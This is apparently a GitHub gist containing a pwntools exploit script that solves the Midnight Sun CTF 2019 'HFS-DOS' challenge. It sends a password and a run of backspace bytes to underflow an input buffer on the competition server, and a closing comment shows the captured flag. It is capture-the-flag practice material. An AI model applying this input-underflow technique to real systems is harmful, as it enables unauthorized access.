Skip to content

Instantly share code, notes, and snippets.

@hama7230

hama7230/exp.py

Created Apr 6, 2019
Embed
What would you like to do?
Midnight Sun CTF 2019 Quals Hfs-dos
#!/usr/bin/env python
from pwn import *
context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
# context(terminal=['tmux', 'new-window']) # open new window
# libc = ELF('')
#elf = ELF('./run')
#context(os='linux', arch=elf.arch)
#context(log_level='debug') # output verbose log
RHOST = "hfs-os-01.play.midnightsunctf.se"
RPORT = 31337
LHOST = "127.0.0.1"
LPORT = 31337
def dbg(ss):
log.info("%s: 0x%x" % (ss, eval(ss)))
conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
if opt in 'rl':
conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
gdbscript = """
continue
""".format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
conn = gdb.debug(['./run'], gdbscript=gdbscript)
else:
conn = process(['./run', 'debug'])
# conn = process(['./run'], env={'LD_PRELOAD': ''})
if opt == 'a': gdb.attach(conn)
# exploit
log.info('Pwning')
conn.sendafter('[HFS_MBR]>', 'sojupwner')
conn.sendafter('Press any key to load HFS-OS!', '\n')
time.sleep(0.1)
conn.send('\x7f'*0x3)
time.sleep(0.1)
conn.send('2\x0d')
# 0x13f
for i in range(0x138/8):
time.sleep(0.1)
conn.send('\x7f'*0x8)
time.sleep(0.1)
conn.send('\x7f'*0x7)
time.sleep(0.1)
conn.send(chr(0x21)+'\x0d')
conn.interactive()
'''
[HFS-DOS]> command not found [HFS SECURE SHELL] Here is your flag for HFS-MBR: m
idnight{th4t_was_n0t_4_buG_1t_is_a_fEatuR3}
'''
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.